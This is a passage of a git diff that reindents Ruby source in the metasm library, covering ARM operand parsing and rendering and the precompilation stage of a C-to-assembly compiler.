:mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12 - os = case sym - when :mem_rn_rm; :rm - when :mem_rn_i8_12; :i8_12 - when :mem_rn_rms; :rm_rs - when :mem_rn_i12; :i16 - end - arg.kind_of? Memref and parse_arg_valid?(op, os, arg.offset) - when :reglist; arg.kind_of? RegList - end - # TODO check flags on reglist, check int values - end + def parse_arg_valid?(op, sym, arg) + case sym + when :rd, :rs, :rn, :rm; arg.kind_of? Reg and arg.shift == 0 and (arg.updated ? op.props[:baseincr] : !op.props[:baseincr]) + when :rm_rs; arg.kind_of? Reg and arg.shift.kind_of? Reg + when :rm_is; arg.kind_of? Reg and arg.shift.kind_of? Integer + when :i16, :i24, :i8_12, :i8_r; arg.kind_of? Expression + when :mem_rn_rm, :mem_rn_i8_12, :mem_rn_rms, :mem_rn_i12 + os = case sym + when :mem_rn_rm; :rm + when :mem_rn_i8_12; :i8_12 + when :mem_rn_rms; :rm_rs + when :mem_rn_i12; :i16 + end + arg.kind_of? Memref and parse_arg_valid?(op, os, arg.offset) + when :reglist; arg.kind_of? RegList + end + # TODO check flags on reglist, check int values + end - def parse_argument(lexer) - if Reg.s_to_i[lexer.nexttok.raw] - arg = Reg.new Reg.s_to_i[lexer.readtok.raw] - lexer.skip_space - case lexer.nexttok.raw.downcase - when 'lsl', 'lsr', 'asr', 'ror' - arg.stype = lexer.readtok.raw.downcase.to_sym - lexer.skip_space - if Reg.s_to_i[lexer.nexttok.raw] - arg.shift = Reg.new Reg.s_to_i[lexer.readtok.raw] - else - arg.shift = Expression.parse(lexer).reduce - end - when 'rrx' - lexer.readtok - arg.stype = :ror - when '!' - lexer.readtok - arg.updated = true - end - elsif lexer.nexttok.raw == '{' - lexer.readtok - arg = RegList.new - loop do - raise "unterminated reglist" if lexer.eos? - lexer.skip_space - if Reg.s_to_i[lexer.nexttok.raw] - arg.list << Reg.new(Reg.s_to_i[lexer.readtok.raw]) - lexer.skip_space - end - case lexer.nexttok.raw - when ','; lexer.readtok - when '-' - lexer.readtok - lexer.skip_space - if not r = Reg.s_to_i[lexer.nexttok.raw] - raise lexer, "reglist parse error: invalid range" - end - lexer.readtok - (arg.list.last.i+1..r).each { |v| - arg.list << Reg.new(v) - } - when '}'; lexer.readtok ; break - else raise lexer, "reglist parse error: ',' or '}' expected, got #{lexer.nexttok.raw.inspect}" - end - end - if lexer.nexttok and lexer.nexttok.raw == '^' - lexer.readtok - arg.usermoderegs = true - end - elsif lexer.nexttok.raw == '[' - lexer.readtok - if not base = Reg.s_to_i[lexer.nexttok.raw] - raise lexer, 'invalid mem base (reg expected)' - end - base = Reg.new Reg.s_to_i[lexer.readtok.raw] - if lexer.nexttok.raw == ']' - lexer.readtok - closed = true - end - if lexer.nexttok.raw != ',' - raise lexer, 'mem off expected' - end - lexer.readtok - off = parse_argument(lexer) - if not off.kind_of? Expression and not off.kind_of? Reg - raise lexer, 'invalid mem off (reg/imm expected)' - end - case lexer.nexttok and lexer.nexttok.raw - when ']' - when ',' - end - lexer.readtok - arg = Memref.new(base, off) - if lexer.nexttok and lexer.nexttok.raw == '!' - lexer.readtok - arg.incr = :pre # TODO :post - end - else - arg = Expression.parse lexer - end - arg - end + def parse_argument(lexer) + if Reg.s_to_i[lexer.nexttok.raw] + arg = Reg.new Reg.s_to_i[lexer.readtok.raw] + lexer.skip_space + case lexer.nexttok.raw.downcase + when 'lsl', 'lsr', 'asr', 'ror' + arg.stype = lexer.readtok.raw.downcase.to_sym + lexer.skip_space + if Reg.s_to_i[lexer.nexttok.raw] + arg.shift = Reg.new Reg.s_to_i[lexer.readtok.raw] + else + arg.shift = Expression.parse(lexer).reduce + end + when 'rrx' + lexer.readtok + arg.stype = :ror + when '!' + lexer.readtok + arg.updated = true + end + elsif lexer.nexttok.raw == '{' + lexer.readtok + arg = RegList.new + loop do + raise "unterminated reglist" if lexer.eos? + lexer.skip_space + if Reg.s_to_i[lexer.nexttok.raw] + arg.list << Reg.new(Reg.s_to_i[lexer.readtok.raw]) + lexer.skip_space + end + case lexer.nexttok.raw + when ','; lexer.readtok + when '-' + lexer.readtok + lexer.skip_space + if not r = Reg.s_to_i[lexer.nexttok.raw] + raise lexer, "reglist parse error: invalid range" + end + lexer.readtok + (arg.list.last.i+1..r).each { |v| + arg.list << Reg.new(v) + } + when '}'; lexer.readtok ; break + else raise lexer, "reglist parse error: ',' or '}' expected, got #{lexer.nexttok.raw.inspect}" + end + end + if lexer.nexttok and lexer.nexttok.raw == '^' + lexer.readtok + arg.usermoderegs = true + end + elsif lexer.nexttok.raw == '[' + lexer.readtok + if not base = Reg.s_to_i[lexer.nexttok.raw] + raise lexer, 'invalid mem base (reg expected)' + end + base = Reg.new Reg.s_to_i[lexer.readtok.raw] + if lexer.nexttok.raw == ']' + lexer.readtok + closed = true + end + if lexer.nexttok.raw != ',' + raise lexer, 'mem off expected' + end + lexer.readtok + off = parse_argument(lexer) + if not off.kind_of? Expression and not off.kind_of? Reg + raise lexer, 'invalid mem off (reg/imm expected)' + end + case lexer.nexttok and lexer.nexttok.raw + when ']' + when ',' + end + lexer.readtok + arg = Memref.new(base, off) + if lexer.nexttok and lexer.nexttok.raw == '!' + lexer.readtok + arg.incr = :pre # TODO :post + end + else + arg = Expression.parse lexer + end + arg + end end end diff --git a/lib/metasm/metasm/arm/render.rb b/lib/metasm/metasm/arm/render.rb index 15c0151a1fff5..473071d35f729 100644 --- a/lib/metasm/metasm/arm/render.rb +++ b/lib/metasm/metasm/arm/render.rb @@ -8,48 +8,48 @@ module Metasm class ARM - class Reg - include Renderable - def render - r = self.class.i_to_s[@i] - r += '!' if updated - if @stype == :lsl and @shift == 0 - [r] - elsif @stype == :ror and @shift == 0 - ["#{r} RRX"] - else - case s = @shift - when Integer; s = Expression[s] - when Reg; s = self.class.i_to_s[s.i] - end - ["#{r} #{@stype.to_s.upcase} #{s}"] - end - end - end + class Reg + include Renderable + def render + r = self.class.i_to_s[@i] + r += '!' if updated + if @stype == :lsl and @shift == 0 + [r] + elsif @stype == :ror and @shift == 0 + ["#{r} RRX"] + else + case s = @shift + when Integer; s = Expression[s] + when Reg; s = self.class.i_to_s[s.i] + end + ["#{r} #{@stype.to_s.upcase} #{s}"] + end + end + end - class Memref - include Renderable - def render - o = @offset - o = Expression[o] if o.kind_of? Integer - case @incr - when nil; ['[', @base, ', ', o, ']'] - when :pre; ['[', @base, ', ', o, ']!'] - when :post; ['[', @base, '], ', o] - end - end - end + class Memref + include Renderable + def render + o = @offset + o = Expression[o] if o.kind_of? Integer + case @incr + when nil; ['[', @base, ', ', o, ']'] + when :pre; ['[', @base, ', ', o, ']!'] + when :post; ['[', @base, '], ', o] + end + end + end - class RegList - include Renderable - def render - r = ['{'] - @list.each { |l| r << l << ', ' } - r[-1] = '}' - r << '^' if usermoderegs - r - end - end + class RegList + include Renderable + def render + r = ['{'] + @list.each { |l| r << l << ', ' } + r[-1] = '}' + r << '^' if usermoderegs + r + end + end end end diff --git a/lib/metasm/metasm/compile_c.rb b/lib/metasm/metasm/compile_c.rb index 9ce56a46f8ef6..4dcd816925add 100644 --- a/lib/metasm/metasm/compile_c.rb +++ b/lib/metasm/metasm/compile_c.rb @@ -9,1429 +9,1429 @@ module Metasm module C - class Parser - def precompile - @toplevel.precompile(Compiler.new(self)) - self - end - end - - # each CPU defines a subclass of this one - class Compiler - # an ExeFormat (mostly used for unique label creation) - attr_accessor :exeformat - # the C Parser (destroyed by compilation) - attr_accessor :parser - # an array of assembler statements (strings) - attr_accessor :source - # list of unique labels generated (to recognize user-defined ones) - attr_accessor :auto_label_list - - attr_accessor :curexpr - # allows 'raise self' (eg struct.offsetof) - def exception(msg='EOF unexpected') - ParseError.new "near #@curexpr: #{msg}" - end - - # creates a new CCompiler from an ExeFormat and a C Parser - def initialize(parser, exeformat=ExeFormat.new, source=[]) - @parser, @exeformat, @source = parser, exeformat, source - @auto_label_list = {} - end - - def new_label(base='') - lbl = @exeformat.new_label base - @auto_label_list[lbl] = true - lbl - end - - def toplevel ; @parser.toplevel end - def typesize ; @parser.typesize end - def sizeof(*a) @parser.sizeof(*a) end - - # compiles the c parser toplevel to assembler statements in self.source (::Array of ::String) - # - # starts by precompiling parser.toplevel (destructively): - # static symbols are converted to toplevel ones, as nested functions - # uses an ExeFormat (the argument) to create unique label/variable names - # - # remove typedefs/enums - # CExpressions: all expr types are converted to __int8/__int16/__int32/__int64 (sign kept) (incl. ptr), + void - # struct member dereference/array indexes are converted to *(ptr + off) - # coma are converted to 2 statements, ?: are converted to If - # :|| and :&& are converted to If + assignment to temporary - # immediate quotedstrings/floats are converted to references to const static toplevel - # postincrements are replaced by a temporary (XXX arglist) - # compound statements are unnested - # Asm are kept (TODO precompile clobber types) - # Declarations: initializers are converted to separate assignment CExpressions - # Blocks are kept unless empty - # structure dereferences/array indexing are converted to *(ptr + offset) - # While/For/DoWhile/Switch are converted to If/Goto - # Continue/Break are converted to Goto - # Cases are converted to Labels during Switch conversion - # Label statements are removed - # Return: 'return ;' => 'return ; goto ;', 'return;' => 'goto ;' - # If: 'if (a) b; else c;' => 'if (a) goto l1; { c; }; goto l2; l1: { b; } l2:' - # && and || in condition are expanded to multiple If - # functions returning struct are precompiled (in Declaration/CExpression/Return) - # - # in a second phase, unused labels are removed from functions, as noop goto (goto x; x:) - # dead code is removed ('goto foo; bar; baz:' => 'goto foo; baz:') (TODO) - # - # after that, toplevel is no longer valid C (bad types, blocks moved...) - # - # then toplevel statements are sorted (.text, .data, .rodata, .bss) and compiled into asm statements in self.source - # - # returns the asm source in a single string - def compile - cf = @exeformat.unique_labels_cache.keys & @auto_label_list.keys - raise "compile_c name conflict: #{cf.inspect}" if not cf.empty? - @exeformat.unique_labels_cache.update @auto_label_list - - @parser.toplevel.precompile(self) - - # reorder statements (arrays of Variables) following exe section typical order - funcs, rwdata, rodata, udata = [], [], [], [] - @parser.toplevel.statements.each { |st| - if st.kind_of? Asm - @source << st.body - next - end - raise 'non-declaration at toplevel! ' + st.inspect if not st.kind_of? Declaration - v = st.var - if v.type.kind_of? Function - funcs << v if v.initializer # no initializer == storage :extern - elsif v.storage == :extern - elsif v.initializer - if v.type.qualifier.to_a.include?(:const) or - (v.type.kind_of? Array and v.type.type.qualifier.to_a.include?(:const)) - rodata << v - else - rwdata << v - end - else - udata << v - end - } - - if not funcs.empty? - @exeformat.compile_setsection @source, '.text' - funcs.each { |func| c_function(func) } - c_program_epilog - end - - align = 1 - if not rwdata.empty? - @exeformat.compile_setsection @source, '.data' - rwdata.each { |data| align = c_idata(data, align) } - end - - if not rodata.empty? - @exeformat.compile_setsection @source, '.rodata' - rodata.each { |data| align = c_idata(data, align) } - end - - if not udata.empty? - @exeformat.compile_setsection @source, '.bss' - udata.each { |data| align = c_udata(data, align) } - end - - # needed to allow asm parser to use our autogenerated label names - @exeformat.unique_labels_cache.delete_if { |k, v| @auto_label_list[k] } - - @source.join("\n") - end - - # compiles a C function +func+ to asm source into the array of strings +str+ - # in a first pass the stack variable offsets are computed, - # then each statement is compiled in turn - def c_function(func) - # must wait the Declaration to run the CExpr for dynamic auto offsets, - # and must run those statements once only - # TODO alloc a stack variable to maintain the size for each dynamic array - # TODO offset of arguments - # TODO nested function - c_init_state(func) - - # hide the full @source while compiling, then add prolog/epilog (saves 1 pass) - @source << '' << "#{func.name}:" - presource, @source = @source, [] - - c_block(func.initializer) - - tmpsource, @source = @source, presource - c_prolog - @source.concat tmpsource - c_epilog - @source << '' - end - - def c_block(blk) - c_block_enter(blk) - blk.statements.each { |stmt| - case stmt - when CExpression; c_cexpr(stmt) - when Declaration; c_decl(stmt.var) - when If; c_ifgoto(stmt.test, stmt.bthen.target) - when Goto; c_goto(stmt.target) - when Label; c_label(stmt.name) - when Return; c_return(stmt.value) - when Asm; c_asm(stmt) - when Block; c_block(stmt) - else raise - end - } - c_block_exit(blk) - end - - def c_block_enter(blk) - end - - def c_block_exit(blk) - end - - def c_label(name) - @source << "#{name}:" - end - - # fills @state.offset (empty hash) - # automatic variable => stack offset, (recursive) - # offset is an ::Integer or a CExpression (dynamic array) - # assumes offset 0 is a ptr-size-aligned address - # TODO registerize automatic variables - def c_reserve_stack(block, off = 0) - block.statements.each { |stmt| - case stmt - when Declaration - next if stmt.var.type.kind_of? Function - off = c_reserve_stack_var(stmt.var, off) - @state.offset[stmt.var] = off - when Block - c_reserve_stack(stmt, off) - # do not update off, not nested subblocks can overlap - end - } - end - - # computes the new stack offset for var - # off is either an offset from stack start (:ptr-size-aligned) or - # a CExpression [[[expr, +, 7], &, -7], +, off] - def c_reserve_stack_var(var, off) - if (arr_type = var.type).kind_of? Array and (arr_sz = arr_type.length).kind_of? CExpression - # dynamic array ! - arr_sz = CExpression.new(arr_sz, :*, sizeof(nil, arr_type.type), - BaseType.new(:long, :unsigned)).precompile_inner(@parser, nil) - off = CExpression.new(arr_sz, :+, off, arr_sz.type) - off = CExpression.new(off, :+, 7, off.type) - off = CExpression.new(off, :&, -7, off.type) - CExpression.new(off, :+, 0, off.type) - else - al = var.type.align(@parser) - sz = sizeof(var) - case off - when CExpression; CExpression.new(off.lexpr, :+, ((off.rexpr + sz + al - 1) / al * al), off.type) - else (off + sz + al - 1) / al * al - end - end - end - - # here you can add thing like stubs for PIC code - def c_program_epilog - end - - # compiles a C static data definition into an asm string - # returns the new alignment value - def c_idata(data, align) - w = data.type.align(@parser) - @source << ".align #{align = w}" if w > align - - @source << data.name.dup - len = c_idata_inner(data.type, data.initializer) - len %= w - len == 0 ? w : len - end - - # dumps an anonymous variable definition, appending to the last line of source - # source.last is a label name or is empty before calling here - # return the length of the data written - def c_idata_inner(type, value) - case type - when BaseType - value ||= 0 - - if type.name == :void - @source.last << ':' if not @source.last.empty? - return 0 - end - - @source.last << - case type.name - when :__int8; ' db ' - when :__int16; ' dw ' - when :__int32; ' dd ' - when :__int64; ' dq ' - when :ptr; " d#{%w[x b w x d x x x q][@parser.typesize[type.name]]} " - when :float; ' db ' + [value].pack(@parser.endianness == :little ? 'e' : 'g').unpack('C*').join(', ') + ' // ' - when :double; ' db ' + [value].pack(@parser.endianness == :little ? 'E' : 'G').unpack('C*').join(', ') + ' // ' - when :longdouble; ' db ' + [value].pack(@parser.endianness == :little ? 'E' : 'G').unpack('C*').join(', ') + ' // ' # XXX same as :double - else raise "unknown idata type #{type.inspect} #{value.inspect}" - end - - @source.last << c_idata_inner_cexpr(value) - - @parser.typesize[type.name] - - when Struct - value ||= [] - @source.last << ':' if not @source.last.empty? - # could .align here, but if there is our label name just before, it should have been .aligned too.. - raise "unknown struct initializer #{value.inspect}" if not value.kind_of? ::Array - sz = 0 - type.members.zip(value).each { |m, v| - if m.name and wsz = type.offsetof(@parser, m.name) and sz < wsz - @source << "db #{wsz-sz} dup(?)" - end - @source << '' - flen = c_idata_inner(m.type, v) - sz += flen - } - - sz - - when Union - value ||= [] - @source.last << ':' if not @source.last.empty? - len = sizeof(nil, type) - raise "unknown union initializer #{value.inspect}" if not value.kind_of? ::Array - idx = value.rindex(value.compact.last) || 0 - raise "empty union initializer" if not idx - wlen = c_idata_inner(type.members[idx].type, value[idx]) - @source << "db #{'0' * (len - wlen) * ', '}" if wlen < len - - len - - when Array - value ||= [] - if value.kind_of? CExpression and not value.op and value.rexpr.kind_of? ::String - elen = sizeof(nil, value.type.type) - @source.last << - case elen - when 1; ' db ' - when 2; ' dw ' - else raise 'bad char* type ' + value.inspect - end << value.rexpr.inspect - - len = type.length || (value.rexpr.length+1) - if len > value.rexpr.length - @source.last << (', 0' * (len - value.rexpr.length)) - end - - elen * len - - elsif value.kind_of? ::Array - @source.last << ':' if not @source.last.empty? - len = type.length || value.length - value.each { |v| - @source << '' - c_idata_inner(type.type, v) - } - len -= value.length - if len > 0 - @source << " db #{len * sizeof(nil, type.type)} dup(0)" - end - - sizeof(nil, type.type) * len - - else raise "unknown static array initializer #{value.inspect}" - end - end - end - - def c_idata_inner_cexpr(expr) - expr = expr.reduce(@parser) if expr.kind_of? CExpression - case expr - when ::Integer; (expr >= 4096) ? ('0x%X' % expr) : expr.to_s - when ::Numeric; expr.to_s - when Variable - case expr.type - when Array; expr.name - else c_idata_inner_cexpr(expr.initializer) - end - when CExpression - if not expr.lexpr - case expr.op - when :& - case expr.rexpr - when Variable; expr.rexpr.name - else raise 'unhandled addrof in initializer ' + expr.rexpr.inspect - end - #when :* - when :+; c_idata_inner_cexpr(expr.rexpr) - when :-; ' -' << c_idata_inner_cexpr(expr.rexpr) - when nil - e = c_idata_inner_cexpr(expr.rexpr) - if expr.rexpr.kind_of? CExpression - e = '(' << e << " & 0#{'ff'*sizeof(expr)}h)" - end - e - else raise 'unhandled initializer expr ' + expr.inspect - end - else - case expr.op - when :+, :-, :*, :/, :%, :<<, :>>, :&, :|, :^ - e = '(' << c_idata_inner_cexpr(expr.lexpr) << - expr.op.to_s << c_idata_inner_cexpr(expr.rexpr) << ')' - if expr.type.integral? - # db are unsigned - e = '(' << e << " & 0#{'ff'*sizeof(expr)}h)" - end - e - #when :'.' - #when :'->' - #when :'[]' - else raise 'unhandled initializer expr ' + expr.inspect - end - end - else raise 'unhandled initializer ' + expr.inspect - end - end - - def c_udata(data, align) - @source << "#{data.name} " - @source.last << - case data.type - when BaseType - len = @parser.typesize[data.type.name] - case data.type.name - when :__int8; 'db ?' - when :__int16; 'dw ?' - when :__int32; 'dd ?' - when :__int64; 'dq ?' - else "db #{len} dup(?)" - end - else - len = sizeof(data) - "db #{len} dup(?)" - end - len %= align - len == 0 ? align : len - end - - def check_reserved_name(var) - end - end - - class Statement - # all Statements/Declaration must define a precompile(compiler, scope) method - # it must append itself to scope.statements - - # turns a statement into a new block - def precompile_make_block(scope) - b = Block.new scope - b.statements << self - b - end - end - - class Block - # precompile all statements, then simplifies symbols/structs types - def precompile(compiler, scope=nil) - stmts = @statements.dup - @statements.clear - stmts.each { |st| - compiler.curexpr = st - st.precompile(compiler, self) - } - - # cleanup declarations - @symbol.delete_if { |n, s| not s.kind_of? Variable } - @struct.delete_if { |n, s| not s.kind_of? Union } - @symbol.each_value { |var| - CExpression.precompile_type(compiler, self, var, true) - } - @struct.each_value { |var| - next if not var.members - var.members.each { |m| - CExpression.precompile_type(compiler, self, m, true) - } - } - scope.statements << self if scope and not @statements.empty? - end - - # removes unused labels, and in-place goto (goto toto; toto:) - def precompile_optimize - list = [] - precompile_optimize_inner(list, 1) - precompile_optimize_inner(list, 2) - end - - # step 1: list used labels/unused goto - # step 2: remove unused labels - def precompile_optimize_inner(list, step) - lastgoto = nil - hadref = false - walk = lambda { |expr| - next if not expr.kind_of? CExpression - # gcc's unary && support - if not expr.op and not expr.lexpr and expr.rexpr.kind_of? Label - list << expr.rexpr.name - else - walk[expr.lexpr] - if expr.rexpr.kind_of? ::Array - expr.rexpr.each { |r| walk[r] } - else - walk[expr.rexpr] - end - end - } - @statements.dup.each { |s| - lastgoto = nil if not s.kind_of? Label - case s - when Block - s.precompile_optimize_inner(list, step) - @statements.delete s if step == 2 and s.statements.empty? - when CExpression; walk[s] if step == 1 - when Label - case step - when 1 - if lastgoto and lastgoto.target == s.name - list << lastgoto - list.delete s.name if not hadref - end - when 2; @statements.delete s if not list.include? s.name - end - when Goto, If - s.kind_of?(If) ? g = s.bthen : g = s - case step - when 1 - hadref = list.include? g.target - lastgoto = g - list << g.target - when 2 - if list.include? g - idx = @statements.index s - @statements.delete s - @statements[idx, 0] = s.test if s != g and not s.test.constant? - end - end - end - } - list - end - - # noop - def precompile_make_block(scope) self end - - def continue_label ; defined?(@continue_label) ? @continue_label : @outer.continue_label end - def continue_label=(l) @continue_label = l end - def break_label ; defined?(@break_label) ? @break_label : @outer.break_label end - def break_label=(l) @break_label = l end - def return_label ; defined?(@return_label) ? @return_label : @outer.return_label end - def return_label=(l) @return_label = l end - def nonauto_label=(l) @nonauto_label = l end - def nonauto_label ; defined?(@nonauto_label) ? @nonauto_label : @outer.nonauto_label end - def function ; defined?(@function) ? @function : @outer.function end - def function=(f) @function = f end - end - - class Declaration - def precompile(compiler, scope) - if (@var.type.kind_of? Function and @var.initializer and scope != compiler.toplevel) or @var.storage == :static or compiler.check_reserved_name(@var) - # TODO fix label name in export table if __exported - scope.symbol.delete @var.name - old = @var.name - @var.name = compiler.new_label @var.name until @var.name != old - compiler.toplevel.symbol[@var.name] = @var - # TODO no pure inline if addrof(func) needed - compiler.toplevel.statements << self unless @var.attributes.to_a.include? 'inline' - else - scope.symbol[@var.name] ||= @var - appendme = true - end - - if i = @var.initializer - if @var.type.kind_of? Function - if @var.type.type.kind_of? Struct - s = @var.type.type - v = Variable.new - v.name = compiler.new_label('return_struct_ptr') - v.type = Pointer.new(s) - CExpression.precompile_type(compiler, scope, v) - @var.type.args.unshift v - @var.type.type = v.type - end - i.function = @var - i.return_label = compiler.new_label('epilog') - i.nonauto_label = {} - i.precompile(compiler) - Label.new(i.return_label).precompile(compiler, i) - i.precompile_optimize - # append now so that static dependencies are declared before us - scope.statements << self if appendme and not @var.attributes.to_a.include? 'inline' - elsif scope != compiler.toplevel and @var.storage != :static - scope.statements << self if appendme - Declaration.precompile_dyn_initializer(compiler, scope, @var, @var.type, i) - @var.initializer = nil - else - scope.statements << self if appendme - @var.initializer = Declaration.precompile_static_initializer(compiler, @var.type, i) - end - else - scope.statements << self if appendme - end - - end - - # turns an initializer to CExpressions in scope.statements - def self.precompile_dyn_initializer(compiler, scope, var, type, init) - case type = type.untypedef - when Array - # XXX TODO type.length may be dynamic !! - case init - when CExpression - # char toto[] = "42" - if not init.kind_of? CExpression or init.op or init.lexpr or not init.rexpr.kind_of? ::String - raise "unknown initializer #{init.inspect} for #{var.inspect}" - end - init = init.rexpr.unpack('C*') + [0] - init.map! { |chr| CExpression.new(nil, nil, chr, type.type) } - precompile_dyn_initializer(compiler, scope, var, type, init) - - when ::Array - type.length ||= init.length - # len is an Integer - init.each_with_index { |it, idx| - next if not it - break if idx >= type.length - idx = CExpression.new(nil, nil, idx, BaseType.new(:long, :unsigned)) - v = CExpression.new(var, :'[]', idx, type.type) - precompile_dyn_initializer(compiler, scope, v, type.type, it) - } - else raise "unknown initializer #{init.inspect} for #{var.inspect}" - end - when Union - case init - when CExpression, Variable - if init.type.untypedef.kind_of? BaseType - # works for struct foo bar[] = {0}; ... - type.members.each { |m| - v = CExpression.new(var, :'.', m.name, m.type) - precompile_dyn_initializer(compiler, scope, v, v.type, init) - } - elsif init.type.untypedef.kind_of? type.class - CExpression.new(var, :'=', init, type).precompile(compiler, scope) - else - raise "bad initializer #{init.inspect} for #{var.inspect}" - end - when ::Array - init.each_with_index{ |it, idx| - next if not it - m = type.members[idx] - v = CExpression.new(var, :'.', m.name, m.type) - precompile_dyn_initializer(compiler, scope, v, m.type, it) - } - else raise "unknown initializer #{init.inspect} for #{var.inspect}" - end - else - case init - when CExpression - CExpression.new(var, :'=', init, type).precompile(compiler, scope) - else raise "unknown initializer #{init.inspect} for #{var.inspect}" - end - end - end - - # returns a precompiled static initializer (eg string constants) - def self.precompile_static_initializer(compiler, type, init) - # TODO - case type = type.untypedef - when Array - if init.kind_of? ::Array - init.map { |i| precompile_static_initializer(compiler, type.type, i) } - else - init - end - when Union - if init.kind_of? ::Array - init.zip(type.members).map { |i, m| precompile_static_initializer(compiler, m.type, i) } - else - init - end - else - if init.kind_of? CExpression and init = init.reduce(compiler) and init.kind_of? CExpression - if not init.op and init.rexpr.kind_of? ::String - v = Variable.new - v.storage = :static - v.name = 'char_' + init.rexpr.gsub(/[^a-zA-Z]/, '')[0, 8] - v.type = Array.new(type.type) - v.type.length = init.rexpr.length + 1 - v.type.type.qualifier = [:const] - v.initializer = CExpression.new(nil, nil, init.rexpr, type) - Declaration.new(v).precompile(compiler, compiler.toplevel) - init.rexpr = v - end - init.rexpr = precompile_static_initializer(compiler, init.rexpr.type, init.rexpr) if init.rexpr.kind_of? CExpression - init.lexpr = precompile_static_initializer(compiler, init.lexpr.type, init.lexpr) if init.lexpr.kind_of? CExpression - end - init - end - end - end - - class If - def precompile(compiler, scope) - expr = lambda { |e| e.kind_of?(CExpression) ? e : CExpression.new(nil, nil, e, e.type) } - - if @bthen.kind_of? Goto or @bthen.kind_of? Break or @bthen.kind_of? Continue - # if () goto l; else b; => if () goto l; b; - if belse - t1 = @belse - @belse = nil - end - - # need to convert user-defined Goto target ! - @bthen.precompile(compiler, scope) - @bthen = scope.statements.pop # break => goto break_label - elsif belse - # if () a; else b; => if () goto then; b; goto end; then: a; end: - t1 = @belse - t2 = @bthen - l2 = compiler.new_label('if_then') - @bthen = Goto.new(l2) - @belse = nil - l3 = compiler.new_label('if_end') - else - # if () a; => if (!) goto end; a; end: - t1 = @bthen - l2 = compiler.new_label('if_end') - @bthen = Goto.new(l2) - @test = CExpression.negate(@test) - end - - @test = expr[@test] - case @test.op - when :'&&' - # if (c1 && c2) goto a; => if (!c1) goto b; if (c2) goto a; b: - l1 = compiler.new_label('if_nand') - If.new(CExpression.negate(@test.lexpr), Goto.new(l1)).precompile(compiler, scope) - @test = expr[@test.rexpr] - precompile(compiler, scope) - when :'||' - l1 = compiler.new_label('if_or') - If.new(expr[@test.lexpr], Goto.new(@bthen.target)).precompile(compiler, scope) - @test = expr[@test.rexpr] - precompile(compiler, scope) - else - @test = CExpression.precompile_inner(compiler, scope, @test) - t = @test.reduce(compiler) - if t.kind_of? ::Integer - if t == 0 - Label.new(l1, nil).precompile(compiler, scope) if l1 - t1.precompile(compiler, scope) if t1 - Label.new(l2, nil).precompile(compiler, scope) if l2 - Label.new(l3, nil).precompile(compiler, scope) if l3 - else - scope.statements << @bthen - Label.new(l1, nil).precompile(compiler, scope) if l1 - Label.new(l2, nil).precompile(compiler, scope) if l2 - t2.precompile(compiler, scope) if t2 - Label.new(l3, nil).precompile(compiler, scope) if l3 - end - return - end - scope.statements << self - end - - Label.new(l1, nil).precompile(compiler, scope) if l1 - t1.precompile(compiler, scope) if t1 - Goto.new(l3).precompile(compiler, scope) if l3 - Label.new(l2, nil).precompile(compiler, scope) if l2 - t2.precompile(compiler, scope) if t2 - Label.new(l3, nil).precompile(compiler, scope) if l3 - end - end - - class For - def precompile(compiler, scope) - if init - @init.precompile(compiler, scope) - scope = @init if @init.kind_of? Block - end - - @body = @body.precompile_make_block scope - @body.continue_label = compiler.new_label 'for_continue' - @body.break_label = compiler.new_label 'for_break' - label_test = compiler.new_label 'for_test' - - Label.new(label_test).precompile(compiler, scope) - if test - If.new(CExpression.negate(@test), Goto.new(@body.break_label)).precompile(compiler, scope) - end - - @body.precompile(compiler, scope) - - Label.new(@body.continue_label).precompile(compiler, scope) - if iter - @iter.precompile(compiler, scope) - end - - Goto.new(label_test).precompile(compiler, scope) - Label.new(@body.break_label).precompile(compiler, scope) - end - end - - class While - def precompile(compiler, scope) - @body = @body.precompile_make_block scope - @body.continue_label = compiler.new_label('while_continue') - @body.break_label = compiler.new_label('while_break') - - Label.new(@body.continue_label).precompile(compiler, scope) - - If.new(CExpression.negate(@test), Goto.new(@body.break_label)).precompile(compiler, scope) - - @body.precompile(compiler, scope) - - Goto.new(@body.continue_label).precompile(compiler, scope) - Label.new(@body.break_label).precompile(compiler, scope) - end - end - - class DoWhile - def precompile(compiler, scope) - @body = @body.precompile_make_block scope - @body.continue_label = compiler.new_label('dowhile_continue') - @body.break_label = compiler.new_label('dowhile_break') - loop_start = compiler.new_label('dowhile_start') - - Label.new(loop_start).precompile(compiler, scope) - - @body.precompile(compiler, scope) - - Label.new(@body.continue_label).precompile(compiler, scope) - - If.new(@test, Goto.new(loop_start)).precompile(compiler, scope) - - Label.new(@body.break_label).precompile(compiler, scope) - end - end - - class Switch - def precompile(compiler, scope) - var = Variable.new - var.storage = :register - var.name = compiler.new_label('switch') - var.type = @test.type - var.initializer = @test - CExpression.precompile_type(compiler, scope, var) - Declaration.new(var).precompile(compiler, scope) - - @body = @body.precompile_make_block scope - @body.break_label = compiler.new_label('switch_break') - @body.precompile(compiler) - default = @body.break_label - # recursive lambda to change Case to Labels - # dynamically creates the If sequence - walk = lambda { |blk| - blk.statements.each_with_index { |s, i| - case s - when Case - label = compiler.new_label('case') - if s.expr == 'default' - default = label - elsif s.exprup - If.new(CExpression.new(CExpression.new(var, :'>=', s.expr, BaseType.new(:int)), :'&&', - CExpression.new(var, :'<=', s.exprup, BaseType.new(:int)), - BaseType.new(:int)), Goto.new(label)).precompile(compiler, scope) - else - If.new(CExpression.new(var, :'==', s.expr, BaseType.new(:int)), - Goto.new(label)).precompile(compiler, scope) - end - blk.statements[i] = Label.new(label) - when Block - walk[s] - end - } - } - walk[@body] - Goto.new(default).precompile(compiler, scope) - scope.statements << @body - Label.new(@body.break_label).precompile(compiler, scope) - end - end - - class Continue - def precompile(compiler, scope) - Goto.new(scope.continue_label).precompile(compiler, scope) - end - end - - class Break - def precompile(compiler, scope) - Goto.new(scope.break_label).precompile(compiler, scope) - end - end - - class Return - def precompile(compiler, scope) - if @value - @value = CExpression.new(nil, nil, @value, @value.type) if not @value.kind_of? CExpression - if @value.type.untypedef.kind_of? Struct - @value = @value.precompile_inner(compiler, scope) - func = scope.function.type - CExpression.new(CExpression.new(nil, :*, func.args.first, @value.type), :'=', @value, @value.type).precompile(compiler, scope) - @value = func.args.first - else - # cast to function return type - @value = CExpression.new(nil, nil, @value, scope.function.type.type).precompile_inner(compiler, scope) - end - scope.statements << self - end - Goto.new(scope.return_label).precompile(compiler, scope) - end - end - - class Label - def precompile(compiler, scope) - if name and (not compiler.auto_label_list[@name]) - @name = scope.nonauto_label[@name] ||= compiler.new_label(@name) - end - scope.statements << self - if statement - @statement.precompile(compiler, scope) - @statement = nil - end - end - end - - class Case - 